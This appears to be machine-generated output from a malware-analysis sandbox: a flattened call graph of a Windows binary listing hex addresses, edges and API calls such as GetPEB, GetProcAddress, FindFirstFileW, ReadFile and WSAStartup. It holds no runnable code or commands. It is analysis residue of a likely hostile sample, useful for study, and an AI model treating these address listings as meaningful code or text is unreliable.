405ea3 10194->10198 10196 405e94 10195->10196 10197 402bab 2 API calls 10196->10197 10196->10198 10197->10198 10198->10182 10198->10189 10199 40f81c 10200 404bee 6 API calls 10199->10200 10201 40f833 10200->10201 10202 404bee 6 API calls 10201->10202 10216 40f94f 10201->10216 10203 40f85c 10202->10203 10204 404bee 6 API calls 10203->10204 10205 40f86b 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40f87a 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f888 10208->10209 10210 404ba7 4 API calls 10209->10210 10211 40f897 10210->10211 10212 405872 4 API calls 10211->10212 10211->10216 10213 40f8d8 10212->10213 10214 405872 4 API calls 10213->10214 10215 40f8ea 10214->10215 10217 405872 4 API calls 10215->10217 10218 40f8fa 10217->10218 10219 405872 4 API calls 10218->10219 10220 40f90c 10219->10220 10221 405781 4 API calls 10220->10221 10222 40f91d 10221->10222 10223 4040bb 12 API calls 10222->10223 10224 40f92d 10223->10224 10225 405762 4 API calls 10224->10225 10226 40f93f 10225->10226 10226->10216 10227 403f9e 5 API calls 10226->10227 10227->10216 9530 402c1f 9531 4031e5 4 API calls 9530->9531 9532 402c31 LoadLibraryW 9531->9532 10237 407e1f 10238 407e2c 10237->10238 10247 407e61 10237->10247 10241 407e3e 10238->10241 10242 402bab 2 API calls 10238->10242 10245 407e51 10238->10245 10239 407eb6 10239->10245 10246 402bab 2 API calls 10239->10246 10240 407ed4 10241->10240 10244 402bab 2 API calls 10241->10244 10242->10241 10243 402bab 2 API calls 10243->10239 10244->10245 10245->10240 10248 402bab 2 API calls 10245->10248 10246->10245 10247->10239 10249 405872 4 API calls 10247->10249 10254 407ea6 10247->10254 10248->10240 10250 407e86 10249->10250 10251 405872 4 API calls 10250->10251 10252 407e96 10251->10252 10253 405872 4 API calls 10252->10253 10253->10254 10254->10239 10254->10243 9545 405924 9546 4031e5 4 API calls 9545->9546 9547 405937 StrStrW 9546->9547 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4109a4 10265->10266 10267 4056bf 2 API calls 10265->10267 10270 410954 10267->10270 10268 4044ee 7 API calls 10268->10270 10270->10268 10271 402bab 2 API calls 10270->10271 10272 410990 10270->10272 10278 41080e 10270->10278 10271->10270 10273 413aca 4 API calls 10272->10273 10274 410998 10273->10274 10275 405695 2 API calls 10274->10275 10276 41099e 10275->10276 10277 402bab 2 API calls 10276->10277 10277->10266 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10270 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10295 410748 10294->10295 10297 402b7c 2 API calls 10295->10297 10299 4107fd 10295->10299 10296 402bab 2 API calls 10296->10292 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10296 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9603 40f12f 9604 41219c 14 API calls 9603->9604 9605 40f13f 9604->9605 9606 41219c 14 API calls 9605->9606 9607 40f14c 9606->9607 9608 41219c 14 API calls 9607->9608 9609 40f159 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f166 9610->9611 9618 40ed35 9619 4056bf 2 API calls 9618->9619 9620 40ed42 9619->9620 9621 412093 20 API calls 9620->9621 9622 40ed63 9621->9622 9623 412093 20 API calls 9622->9623 9624 40ed73 9623->9624 9625 413aca 4 API calls 9624->9625 9626 40ed80 9625->9626 9627 405695 2 API calls 9626->9627 9628 40ed8e 9627->9628 8072 40f3c5 8077 41219c 8072->8077 8075 41219c 14 API calls 8076 40f3e1 8075->8076 8078 4121b1 8077->8078 8093 40f3d3 8077->8093 8079 4121be 8078->8079 8083 4121c5 8078->8083 8125 413ba4 8079->8125 8080 4121ca 8095 404056 8080->8095 8083->8080 8087 412210 8083->8087 8084 4121c3 8084->8093 8102 405b6f 8084->8102 8087->8093 8130 403fbf 8087->8130 8088 41224d 8090 402bab 2 API calls 8088->8090 8088->8093 8090->8093 8093->8075 8141 402b7c GetProcessHeap RtlAllocateHeap 8095->8141 8097 404066 8099 404095 8097->8099 8143 4031e5 8097->8143 8099->8084 8101 402bab 2 API calls 8101->8099 8103 405b7d 8102->8103 8104 402b7c 2 API calls 8103->8104 8105 405b99 8104->8105 8114 405c02 8105->8114 8179 4059b8 8105->8179 8107 405c09 8109 402bab 2 API calls 8107->8109 8108 405bba 8108->8107 8110 402b7c 2 API calls 8108->8110 8109->8114 8111 405bdd 8110->8111 8111->8107 8112 405be4 8111->8112 8113 402bab 2 API calls 8112->8113 8113->8114 8114->8088 8115 413a58 8114->8115 8116 413a63 8115->8116 8124 412245 8115->8124 8116->8124 8182 405781 8116->8182 8119 405781 4 API calls 8120 413aa0 8119->8120 8185 4057df 8120->8185 8123 405781 4 API calls 8123->8124 8138 402bab 8124->8138 8126 413bad 8125->8126 8127 404056 6 API calls 8126->8127 8129 413bb8 8126->8129 8128 413bc5 8127->8128 8128->8084 8129->8084 8131 402b7c 2 API calls 8130->8131 8132 403fcf 8131->8132 8133 403ff4 8132->8133 8304 403b98 8132->8304 8133->8084 8136 403ff8 GetLastError 8137 402bab 2 API calls 8136->8137 8137->8133 8139 402bb4 GetProcessHeap HeapFree 8138->8139 8140 402bc6 8138->8140 8139->8140 8140->8088 8142 402b98 8141->8142 8142->8097 8144 4031f3 8143->8144 8145 403236 8143->8145 8144->8145 8148 403208 8144->8148 8154 4030a5 8145->8154 8147 403224 8150 403258 8147->8150 8152 4031e5 4 API calls 8147->8152 8160 403263 8148->8160 8150->8099 8150->8101 8151 40320d 8151->8150 8153 4030a5 4 API calls 8151->8153 8152->8150 8153->8147 8166 402ca4 8154->8166 8156 4030b0 8157 4030b5 8156->8157 8170 4030c4 8156->8170 8157->8147 8161 40326d 8160->8161 8162 402b7c 2 API calls 8161->8162 8165 4032b7 8161->8165 8163 40328c 8162->8163 8164 402b7c 2 API calls 8163->8164 8164->8165 8165->8151 8167 403079 8166->8167 8169 40307c 8167->8169 8174 40317b GetPEB 8167->8174 8169->8156 8173 4030eb 8170->8173 8171 4030c0 8171->8147 8173->8171 8176 402c03 8173->8176 8175 40319b 8174->8175 8175->8169 8177 4031e5 3 API calls 8176->8177 8178 402c15 GetProcAddress 8177->8178 8178->8171 8180 4031e5 4 API calls 8179->8180 8181 4059cb 8180->8181 8181->8108 8200 405797 8182->8200 8184 405792 8184->8119 8186 405832 8185->8186 8187 4057eb 8185->8187 8186->8123 8186->8124 8187->8186 8210 4040bb 8187->8210 8190 405839 8192 405853 8190->8192 8237 405627 8190->8237 8191 40582c 8234 403f9e 8191->8234 8248 405762 8192->8248 8198 403f9e 5 API calls 8198->8186 8201 4057a1 8200->8201 8202 4057bd 8200->8202 8201->8202 8204 4056fc 8201->8204 8202->8184 8205 405714 8204->8205 8206 402b7c 2 API calls 8205->8206 8207 405730 8206->8207 8208 402bab 2 API calls 8207->8208 8209 405752 8207->8209 8208->8209 8209->8202 8211 4031e5 4 API calls 8210->8211 8212 4040d5 CreateFileW 8211->8212 8213 4040f8 8212->8213 8214 40418d 8212->8214 8215 4031e5 4 API calls 8213->8215 8216 404183 8214->8216 8254 403c90 8214->8254 8222 404105 8215->8222 8216->8186 8216->8190 8216->8191 8220 40416d 8251 403c40 8220->8251 8222->8220 8226 4031e5 4 API calls 8222->8226 8224 4040bb 9 API calls 8227 4041c8 8224->8227 8225 402bab 2 API calls 8225->8216 8228 404131 VirtualAlloc 8226->8228 8227->8225 8228->8220 8229 404142 8228->8229 8230 4031e5 4 API calls 8229->8230 8231 40414f ReadFile 8230->8231 8231->8220 8232 404160 8231->8232 8233 4031e5 4 API calls 8232->8233 8233->8220 8235 4031e5 4 API calls 8234->8235 8236 403fb1 VirtualFree 8235->8236 8236->8186 8238 4031e5 4 API calls 8237->8238 8239 40563a 8238->8239 8240 405872 8239->8240 8242 405881 8240->8242 8241 4058bc 8243 405797 4 API calls 8241->8243 8245 4058af 8241->8245 8242->8241 8301 4058d4 8242->8301 8243->8245 8245->8192 8247 405781 4 API calls 8247->8241 8249 405781 4 API calls 8248->8249 8250 405770 8249->8250 8250->8198 8252 4031e5 4 API calls 8251->8252 8253 403c52 FindCloseChangeNotification 8252->8253 8253->8216 8255 403ca3 8254->8255 8258 403caa 8254->8258 8281 405dc5 8255->8281 8257 404056 6 API calls 8259 403cbe 8257->8259 8258->8257 8260 403d3a 8258->8260 8261 403d2e 8259->8261 8262 403d17 8259->8262 8263 403ccf 8259->8263 8260->8216 8277 403c59 8260->8277 8261->8260 8265 402bab 2 API calls 8261->8265 8266 405b6f 6 API calls 8262->8266 8264 405b6f 6 API calls 8263->8264 8268 403cdd 8264->8268 8265->8260 8267 403d14 8266->8267 8270 402bab 2 API calls 8267->8270 8269 405b6f 6 API calls 8268->8269 8271 403cee 8269->8271 8270->8261 8271->8267 8286 403d4d 8271->8286 8274 403d0b 8276 402bab 2 API calls 8274->8276 8276->8267 8278 403c21 8277->8278 8279 4031e5 4 API calls 8278->8279 8280 403c33 8279->8280 8280->8224 8280->8227 8295 406799 8281->8295 8283 405dd5 8284 402b7c 2 API calls 8283->8284 8285 405dfe 8284->8285 8285->8258 8298 403bb7 8286->8298 8288 403cfe 8288->8274 8289 403c62 8288->8289 8290 403d4d 5 API calls 8289->8290 8291 403c6d 8290->8291 8292 403c72 8291->8292 8293 4031e5 4 API calls 8291->8293 8292->8274 8294 403c87 CreateDirectoryW 8293->8294 8294->8274 8296 4031e5 4 API calls 8295->8296 8297 4067ad 8296->8297 8297->8283 8299 4031e5 4 API calls 8298->8299 8300 403bc9 GetFileAttributesW 8299->8300 8300->8288 8302 405797 4 API calls 8301->8302 8303 4058a8 8302->8303 8303->8245 8303->8247 8305 4031e5 4 API calls 8304->8305 8306 403baa 8305->8306 8306->8133 8306->8136 9743 40ebc6 9744 4040bb 12 API calls 9743->9744 9745 40ebdf 9744->9745 9746 40ecd7 9745->9746 9763 407795 9745->9763 9749 40eccd 9751 403f9e 5 API calls 9749->9751 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751->9746 9752 40ecb5 9753 402bab 2 API calls 9752->9753 9754 40ecbd 9753->9754 9755 413aca 4 API calls 9754->9755 9756 40ecc7 9755->9756 9757 405695 2 API calls 9756->9757 9757->9749 9758 407908 GetProcessHeap RtlAllocateHeap 9758->9761 9760 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9760->9761 9761->9752 9761->9758 9761->9760 9762 402bab GetProcessHeap HeapFree 9761->9762 9774 412269 9761->9774 9762->9761 9765 4077ab 9763->9765 9764 4077b3 9764->9749 9764->9750 9765->9764 9781 405ae9 9765->9781 9767 4077e1 9767->9764 9768 407802 9767->9768 9769 4077f8 9767->9769 9771 402b7c 2 API calls 9768->9771 9770 402bab 2 API calls 9769->9770 9770->9764 9772 407811 9771->9772 9773 402bab 2 API calls 9772->9773 9773->9764 9797 40374e 9774->9797 9777 412299 9777->9761 9780 402bab 2 API calls 9780->9777 9782 405af7 9781->9782 9783 402b7c 2 API calls 9782->9783 9784 405b03 9783->9784 9793 405b5a 9784->9793 9794 405998 9784->9794 9786 405b21 9787 405b61 9786->9787 9789 402b7c 2 API calls 9786->9789 9788 402bab 2 API calls 9787->9788 9788->9793 9790 405b39 9789->9790 9790->9787 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9793 9793->9767 9795 4031e5 4 API calls 9794->9795 9796 4059ab 9795->9796 9796->9786 9798 402b7c 2 API calls 9797->9798 9799 40375f 9798->9799 9800 4031e5 4 API calls 9799->9800 9803 4037a3 9799->9803 9801 40378f 9800->9801 9802 402bab 2 API calls 9801->9802 9801->9803 9802->9803 9803->9777 9804 4037be 9803->9804 9805 4031e5 4 API calls 9804->9805 9806 4037e2 9805->9806 9807 40382b 9806->9807 9808 402b7c 2 API calls 9806->9808 9807->9780 9809 403802 9808->9809 9810 403832 9809->9810 9812 403809 9809->9812 9811 4036a3 4 API calls 9810->9811 9811->9807 9813 4036a3 4 API calls 9812->9813 9813->9807 8904 410cd1 8909 412093 8904->8909 8907 412093 20 API calls 8908 410cff 8907->8908 8911 4120a5 8909->8911 8930 410cf1 8909->8930 8910 4120b3 8912 404056 6 API calls 8910->8912 8911->8910 8916 412100 8911->8916 8913 4120ba 8912->8913 8914 405b6f 6 API calls 8913->8914 8915 412152 8913->8915 8913->8930 8918 412125 8914->8918 8931 403d74 8915->8931 8917 403fbf 7 API calls 8916->8917 8916->8930 8917->8913 8918->8915 8922 412139 8918->8922 8923 41214d 8918->8923 8921 41218c 8925 402bab 2 API calls 8921->8925 8921->8930 8927 402bab 2 API calls 8922->8927 8926 402bab 2 API calls 8923->8926 8924 402bab 2 API calls 8924->8921 8925->8930 8926->8915 8928 41213e 8927->8928 8929 402bab 2 API calls 8928->8929 8929->8930 8930->8907 8932 403d87 8931->8932 8933 403ea3 8932->8933 8934 405b6f 6 API calls 8932->8934 8935 405b6f 6 API calls 8933->8935 8936 403da3 8934->8936 8937 403eb9 8935->8937 8936->8933 8938 4031e5 4 API calls 8936->8938 8939 4031e5 4 API calls 8937->8939 8945 403f6f 8937->8945 8941 403dbc FindFirstFileW 8938->8941 8940 403ed3 FindFirstFileW 8939->8940 8957 403f8d 8940->8957 8961 403ee8 8940->8961 8952 403e9c 8941->8952 8962 403dd1 8941->8962 8942 402bab 2 API calls 8942->8945 8943 402bab 2 API calls 8943->8933 8944 4031e5 4 API calls 8946 403e84 FindNextFileW 8944->8946 8945->8921 8945->8924 8947 403e96 8946->8947 8946->8962 8971 403bef 8947->8971 8948 4031e5 4 API calls 8951 403f50 FindNextFileW 8948->8951 8950 405b6f 6 API calls 8950->8961 8954 403f87 8951->8954 8951->8961 8952->8943 8953 405b6f 6 API calls 8953->8962 8956 403bef 5 API calls 8954->8956 8955 403f75 8958 402bab 2 API calls 8955->8958 8956->8957 8957->8942 8960 403f7b 8958->8960 8959 403d74 15 API calls 8959->8962 8963 403bef 5 API calls 8960->8963 8961->8948 8961->8950 8961->8955 8964 402bab 2 API calls 8961->8964 8974 40fa23 8961->8974 8962->8944 8962->8953 8962->8959 8965 402bab 2 API calls 8962->8965 8966 403f63 8962->8966 8963->8945 8964->8961 8965->8962 8967 402bab 2 API calls 8966->8967 8968 403f69 8967->8968 8969 403bef 5 API calls 8968->8969 8969->8945 8972 4031e5 4 API calls 8971->8972 8973 403c01 FindClose 8972->8973 8973->8952 8975 40fa39 8974->8975 8976 410293 8975->8976 8977 405b6f 6 API calls 8975->8977 8976->8961 8978 40ffcc 8977->8978 8978->8976 8979 4040bb 12 API calls 8978->8979 8980 40ffeb 8979->8980 8981 41028c 8980->8981 8984 402b7c 2 API calls 8980->8984 9029 41027d 8980->9029 8982 402bab 2 API calls 8981->8982 8982->8976 8983 403f9e 5 API calls 8983->8981 8985 41001e 8984->8985 8986 40a423 4 API calls 8985->8986 8985->9029 8987 41004a 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 41005c 8988->8989 8990 4031e5 4 API calls 8989->8990 8991 410079 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 410096 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4100b0 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4100cd 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100ea 8998->8999 9030 412516 8999->9030 9001 4100fd 9002 40642c 5 API calls 9001->9002 9003 41013e 9002->9003 9004 410142 9003->9004 9005 41019f 9003->9005 9006 40488c 5 API calls 9004->9006 9008 4031e5 4 API calls 9005->9008 9007 410151 9006->9007 9010 41019c 9007->9010 9011 404866 4 API calls 9007->9011 9022 4101bb 9008->9022 9009 41022a 9019 413a58 13 API calls 9009->9019 9010->9009 9012 40642c 5 API calls 9010->9012 9013 410163 9011->9013 9014 410201 9012->9014 9018 406c4c 6 API calls 9013->9018 9026 41018e 9013->9026 9016 410205 9014->9016 9017 41022f 9014->9017 9015 403c40 5 API calls 9015->9010 9020 4126a7 7 API calls 9016->9020 9033 4125db 9017->9033 9023 410178 9018->9023 9027 41026e 9019->9027 9020->9009 9024 4031e5 4 API calls 9022->9024 9025 406c4c 6 API calls 9023->9025 9024->9010 9025->9026 9026->9015 9028 402bab 2 API calls 9027->9028 9028->9029 9029->8983 9031 4031e5 4 API calls 9030->9031 9032 412539 9031->9032 9032->9001 9034 40488c 5 API calls 9033->9034 9035 4125ec 9034->9035 9036 41269f 9035->9036 9037 4031e5 4 API calls 9035->9037 9036->9009 9038 412609 9037->9038 9040 4031e5 4 API calls 9038->9040 9045 41268f 9038->9045 9039 403c40 5 API calls 9039->9036 9041 41262a 9040->9041 9049 412675 9041->9049 9050 4124f1 9041->9050 9043 4031e5 4 API calls 9043->9045 9045->9039 9046 412663 9048 4031e5 4 API calls 9046->9048 9047 4124f1 4 API calls 9047->9046 9048->9049 9049->9043 9051 4031e5 4 API calls 9050->9051 9052 412503 9051->9052 9052->9046 9052->9047 9239 4049dc 9240 4031e5 4 API calls 9239->9240 9241 4049ef 9240->9241 9896 40cddd 9897 405b6f 6 API calls 9896->9897 9898 40cdee 9897->9898 9899 40ce06 9898->9899 9900 413a58 13 API calls 9898->9900 9901 405b6f 6 API calls 9899->9901 9907 40ce59 9899->9907 9902 40ce00 9900->9902 9904 40ce1c 9901->9904 9903 402bab 2 API calls 9902->9903 9903->9899 9906 403d74 19 API calls 9904->9906 9904->9907 9910 40ce52 9904->9910 9905 402bab 2 API calls 9905->9907 9908 40ce45 9906->9908 9909 402bab 2 API calls 9908->9909 9908->9910 9909->9910 9910->9905 9242 40ecde 9243 412093 20 API calls 9242->9243 9244 40ecfd 9243->9244 9245 412093 20 API calls 9244->9245 9246 40ed0d 9245->9246 9250 40e8df 9251 412093 20 API calls 9250->9251 9252 40e8f8 9251->9252 9253 412093 20 API calls 9252->9253 9254 40e908 9253->9254 9261 404b22 9254->9261 9256 40e91c 9257 40e936 9256->9257 9260 40e93d 9256->9260 9268 40e944 9256->9268 9259 402bab 2 API calls 9257->9259 9259->9260 9262 402b7c 2 API calls 9261->9262 9263 404b33 9262->9263 9267 404b66 9263->9267 9277 4049b3 9263->9277 9266 402bab 2 API calls 9266->9267 9267->9256 9269 4056bf 2 API calls 9268->9269 9270 40e952 9269->9270 9271 4057df 13 API calls 9270->9271 9276 40e976 9270->9276 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9276 9276->9257 9278 4031e5 4 API calls 9277->9278 9279 4049c6 9278->9279 9279->9266 9279->9267 9280 4139de 9289 413855 9280->9289 9282 4139f1 9283 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9282->9283 9288 4139f7 9283->9288 9284 413866 58 API calls 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9288->9284 9290 4031e5 4 API calls 9289->9290 9291 413864 9290->9291 9291->9291 9916 4116e7 9917 4117ba 9916->9917 9918 4117f1 9917->9918 9919 405b6f 6 API calls 9917->9919 9920 4117d0 9919->9920 9920->9918 9921 404cbf 8 API calls 9920->9921 9922 4117eb 9921->9922 9923 402bab 2 API calls 9922->9923 9923->9918 9311 4094e7 9312 404b22 6 API calls 9311->9312 9313 4094fe 9312->9313 9314 409554 9313->9314 9315 405b6f 6 API calls 9313->9315 9316 409514 9315->9316 9317 404b22 6 API calls 9316->9317 9323 40954d 9316->9323 9319 40952d 9317->9319 9318 402bab 2 API calls 9318->9314 9320 409408 15 API calls 9319->9320 9325 409544 9319->9325 9322 40953e 9320->9322 9321 402bab 2 API calls 9321->9323 9324 402bab 2 API calls 9322->9324 9323->9318 9324->9325 9325->9321 9334 4058ea 9335 4031e5 4 API calls 9334->9335 9336 4058fd StrStrA 9335->9336 9968 40d4ea 9969 404bee 6 API calls 9968->9969 9970 40d500 9969->9970 9971 40d5a0 9970->9971 9972 404bee 6 API calls 9970->9972 9973 40d529 9972->9973 9974 404bee 6 API calls 9973->9974 9975 40d537 9974->9975 9976 404bee 6 API calls 9975->9976 9977 40d546 9976->9977 9977->9971 9978 405872 4 API calls 9977->9978 9979 40d56d 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d57c 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d58e 9982->9983 9984 405872 4 API calls 9983->9984 9984->9971 9985 40a3ea 9986 40374e 6 API calls 9985->9986 9987 40a403 9986->9987 9988 40a419 9987->9988 9989 4059d8 4 API calls 9987->9989 9990 40a411 9989->9990 9991 402bab 2 API calls 9990->9991 9991->9988 9374 404df3 WSAStartup 9378 4091f6 9379 404b22 6 API calls 9378->9379 9380 40920b 9379->9380 9381 409222 9380->9381 9382 409408 15 API calls 9380->9382 9383 40921c 9382->9383 9384 402bab 2 API calls 9383->9384 9384->9381 10018 4117fe 10019 404c4e 6 API calls 10018->10019 10020 411888 10019->10020 10021 404c4e 6 API calls 10020->10021 10023 411925 10020->10023 10022 4118ab 10021->10022 10022->10023 10037 4119b3 10022->10037 10025 4118c5 10026 4119b3 4 API calls 10025->10026 10027 4118d0 10026->10027 10027->10023 10028 4056bf 2 API calls 10027->10028 10029 4118fd 10028->10029 10030 405872 4 API calls 10029->10030 10031 41190a 10030->10031 10032 405872 4 API calls 10031->10032 10033 411915 10032->10033 10034 413aca 4 API calls 10033->10034 10035 41191f 10034->10035 10036 405695 2 API calls 10035->10036 10036->10023 10038 4119c6 10037->10038 10039 4119bf 10037->10039 10040 4031e5 4 API calls 10038->10040 10039->10025 10040->10039 9388 40e880 9389 41219c 14 API calls 9388->9389 9390 40e88e 9389->9390 9391 41219c 14 API calls 9390->9391 9392 40e89c 9391->9392 10104 40e48a 10105 404bee 6 API calls 10104->10105 10106 40e4d0 10105->10106 10107 40e4f4 10106->10107 10108 405872 4 API calls 10106->10108 10108->10107 9489 410390 9490 404b22 6 API calls 9489->9490 9491 4103a5 9490->9491 9492 410409 9491->9492 9493 405b6f 6 API calls 9491->9493 9496 4103ba 9493->9496 9494 410402 9495 402bab 2 API calls 9494->9495 9495->9492 9496->9494 9498 403d74 19 API calls 9496->9498 9501 4103fb 9496->9501 9497 402bab 2 API calls 9497->9494 9499 4103ee 9498->9499 9500 402bab 2 API calls 9499->9500 9499->9501 9500->9501 9501->9497 10119 40ed96 10120 4040bb 12 API calls 10119->10120 10134 40edb0 10120->10134 10121 40ef90 10122 40ef87 10123 403f9e 5 API calls 10122->10123 10123->10121 10124 405ae9 6 API calls 10124->10134 10125 412269 6 API calls 10125->10134 10126 40ef61 10129 40ef6e 10126->10129 10130 402bab 2 API calls 10126->10130 10127 402bab GetProcessHeap HeapFree 10127->10134 10128 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10128->10134 10131 40ef7c 10129->10131 10132 402bab 2 API calls 10129->10132 10130->10129 10131->10122 10133 402bab 2 API calls 10131->10133 10132->10131 10133->10122 10134->10121 10134->10122 10134->10124 10134->10125 10134->10126 10134->10127 10134->10128 10135 40ef98 10136 404c4e 6 API calls 10135->10136 10137 40efb6 10136->10137 10138 40f02a 10137->10138 10150 40f054 10137->10150 10141 404bee 6 API calls 10142 40efda 10141->10142 10143 404bee 6 API calls 10142->10143 10144 40efe9 10143->10144 10144->10138 10145 405872 4 API calls 10144->10145 10146 40f008 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f01a 10147->10148 10149 405872 4 API calls 10148->10149 10149->10138 10151 40f064 10150->10151 10152 402b7c 2 API calls 10151->10152 10154 40f072 10152->10154 10153 40efca 10153->10141 10154->10153 10156 405ecd 10154->10156 10157 4059b8 4 API calls 10156->10157 10158 405edf 10157->10158 10158->10154 9508 410c98 9509 41219c 14 API calls 9508->9509 9510 410ca8 9509->9510 9511 41219c 14 API calls 9510->9511 9512 410cb5 9511->9512 9513 412093 20 API calls 9512->9513 9514 410cc9 9513->9514 10228 41249c 10229 4056bf 2 API calls 10228->10229 10230 4124aa 10229->10230 10231 4057df 13 API calls 10230->10231 10236 4124ce 10230->10236 10232 4124be 10231->10232 10233 413aca 4 API calls 10232->10233 10234 4124c8 10233->10234 10235 405695 2 API calls 10234->10235 10235->10236 9518 40f49e 9519 40f4b6 13 API calls 9518->9519 9520 40f4a8 9519->9520 9521 40929e 9522 413b28 6 API calls 9521->9522 9523 4092a4 9522->9523 9524 405b6f 6 API calls 9523->9524 9525 4092af 9524->9525 9526 4092c5 9525->9526 9527 409408 15 API calls 9525->9527 9528 4092bf 9527->9528 9529 402bab 2 API calls 9528->9529 9529->9526 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9566 4090aa 9567 404b22 6 API calls 9566->9567 9568 4090c1 9567->9568 9569 4090d8 9568->9569 9570 409408 15 API calls 9568->9570 9571 404b22 6 API calls 9569->9571 9572 4090d2 9570->9572 9573 4090eb 9571->9573 9574 402bab 2 API calls 9572->9574 9575 408c4d 15 API calls 9573->9575 9578 409104 9573->9578 9574->9569 9576 4090fe 9575->9576 9577 402bab 2 API calls 9576->9577 9577->9578 9585 409cae 9600 404b79 9585->9600 9587 409cc5 9588 409d27 9587->9588 9590 405b6f 6 API calls 9587->9590 9591 409d2f 9587->9591 9589 402bab 2 API calls 9588->9589 9589->9591 9592 409cec 9590->9592 9592->9588 9593 404b79 6 API calls 9592->9593 9594 409d05 9593->9594 9595 409d1e 9594->9595 9596 408c4d 15 API calls 9594->9596 9597 402bab 2 API calls 9595->9597 9598 409d18 9596->9598 9597->9588 9599 402bab 2 API calls 9598->9599 9599->9595 9601 404b22 6 API calls 9600->9601 9602 404b8a 9601->9602 9602->9587 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10325 412013 10323->10325 10324 412075 10325->10324 10340 41206a 10325->10340 10341 411a8d 10325->10341 10327 402bab 2 API calls 10327->10324 10329 4056bf 2 API calls 10330 41203d 10329->10330 10331 405872 4 API calls 10330->10331 10332 41204a 10331->10332 10333 413aca 4 API calls 10332->10333 10334 412054 10333->10334 10335 405695 2 API calls 10334->10335 10336 41205a 10335->10336 10337 413a58 13 API calls 10336->10337 10338 412064 10337->10338 10339 402bab 2 API calls 10338->10339 10339->10340 10340->10327 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10340 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9632 40f6b8 9633 41219c 14 API calls 9632->9633 9634 40f6c7 9633->9634 9635 41219c 14 API calls 9634->9635 9636 40f6d5 9635->9636 9637 41219c 14 API calls 9636->9637 9638 40f6df 9637->9638 9657 40d6bd 9658 4056bf 2 API calls 9657->9658 9659 40d6c9 9658->9659 9670 404cbf 9659->9670 9662 404cbf 8 API calls 9663 40d6f4 9662->9663 9664 404cbf 8 API calls 9663->9664 9665 40d702 9664->9665 9666 413aca 4 API calls 9665->9666 9667 40d711 9666->9667 9668 405695 2 API calls 9667->9668 9669 40d71f 9668->9669 9671 402b7c 2 API calls 9670->9671 9672 404ccd 9671->9672 9673 404ddc 9672->9673 9674 404b8f 5 API calls 9672->9674 9673->9662 9675 404ce4 9674->9675 9676 404dd4 9675->9676 9678 402b7c 2 API calls 9675->9678 9677 402bab 2 API calls 9676->9677 9677->9673 9679 404d04 9678->9679 9680 404dcc 9679->9680 9682 404dc6 9679->9682 9683 402b7c 2 API calls 9679->9683 9685 404b8f 5 API calls 9679->9685 9686 402bab GetProcessHeap HeapFree 9679->9686 9687 404a39 5 API calls 9679->9687 9688 405b6f 6 API calls 9679->9688 9689 404cbf 8 API calls 9679->9689 9681 404a39 5 API calls 9680->9681 9681->9676 9684 402bab 2 API calls 9682->9684 9683->9679 9684->9680 9685->9679 9686->9679 9687->9679 9688->9679 9689->9679 9690 40f0bf 9691 4056bf 2 API calls 9690->9691 9692 40f0c9 9691->9692 9693 40f115 9692->9693 9695 404cbf 8 API calls 9692->9695 9694 41219c 14 API calls 9693->9694 9696 40f128 9694->9696 9697 40f0ed 